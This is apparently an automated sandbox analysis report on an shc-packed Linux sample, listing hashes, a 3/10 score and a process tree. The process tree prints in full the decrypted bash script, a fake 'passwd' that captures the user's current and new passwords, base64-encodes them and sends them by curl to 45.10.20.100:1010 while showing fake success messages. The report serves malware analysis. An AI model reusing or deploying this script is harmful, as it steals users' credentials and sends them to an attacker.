Resubmissions
02/12/2024, 02:52 UTC
241202-dcyx7s1lfk 10Analysis
-
max time kernel
0s -
max time network
129s -
platform
ubuntu-24.04_amd64 -
resource
ubuntu2404-amd64-20240729-en -
resource tags
-
submitted
02/12/2024, 02:52 UTC
General
-
Target
样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973
-
Size
990KB
-
MD5
cdafefedb4709959b4260435dc6f5973
-
SHA1
9c54fa7b42fb4f25e6dbc995741661cee1bd8141
-
SHA256
cb7d520296116df898c01bb9e94c05efcaa38dffb14354f42b62262c5b147e34
-
SHA512
391bf2745abbac6ccd8eee0c7e3ea62daec185ac997d8a8cb0c918c733defdc701ff0ba44d727a3619a9be0e2070e0e34e8ceb2e1cceca889cb0f94b92c2e404
-
SSDEEP
24576:bNAp09HLyf/Jck/sGjeXFAGqkkdagwGKLUU:bip0Byf/Jck/sGjYBlEwGK
Score
3/10
Malware Config
Signatures
-
Reads runtime system information 1 IoCs
Reads data from /proc virtual filesystem.
Processes
-
/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F59731⤵
-
/bin/bash/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973 -c "exec '/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973' \"\$@\"" /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F59731⤵
-
/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F59731⤵
-
/bin/bash/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973 -c " #!/bin/bash if [ \"\$1\" = \"pollo\" ]; then echo 'pollo 👍' exit fi username=\$(whoami) if [ \"\$username\" = \"root\" ]; then if [ \"\$#\" -ne \"0\" ]; then echo 'Changing password for user '\$1. else echo 'Changing password for user root.' fi sleep 0.1 read -sp 'New password:' passvar1 sleep 0.1 echo -e read -sp 'Retype new password:' passvar2 pass=\$(echo \$username \$passvar1 \$passvar2 | base64) curl -s http://45.10.20.100:1010/pass?pass=\$pass &> /dev/null || cd1 -s http://45.10.20.100:1010/pass?pass=\$pass &> /dev/null if [ \"\$passvar1\" != \"\$passvar2\" ]; then echo -e echo 'Sorry, passwords do not match.' echo 'passwd: Have exhausted maximum number of retries for service' sleep 0.2 else echo -e echo 'passwd: all authentication tokens updated successfully.' sleep 0.2 fi else echo 'Changing password for user '\$username. read -sp '(current) UNIX password:' passvar0 echo -e read -sp 'New password:' passvar1 sleep 0.1 echo -e read -sp 'Retype new password:' passvar2 pass=\$(echo \$username \$passvar0 \$passvar1 \$passvar2 | base64) curl -s http://45.10.20.100:1010/pass?pass=\$pass &> /dev/null || cd1 -s http://45.10.20.100:1010/pass?pass=\$pass &> /dev/null if [ \"\$passvar1\" != \"\$passvar2\" ]; then echo -e echo 'Sorry, passwords do not match.' echo 'passwd: Have exhausted maximum number of retries for service' sleep 0.2 else echo -e echo 'passwd: all authentication tokens updated successfully.' sleep 0.2 fi fi " /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F59731⤵
-
/usr/bin/whoamiwhoami2⤵
-
-
/usr/bin/sleepsleep 0.12⤵
-
-
/usr/bin/sleepsleep 0.12⤵
-
-
/usr/bin/base64base642⤵
-
-
/usr/bin/curlcurl -s "http://45.10.20.100:1010/pass?pass=cm9vdAo="2⤵
- Reads runtime system information
-
-
/usr/bin/sleepsleep 0.22⤵
-
Network
- No results found
-
45.10.20.100:1010
-
224.0.0.251:5353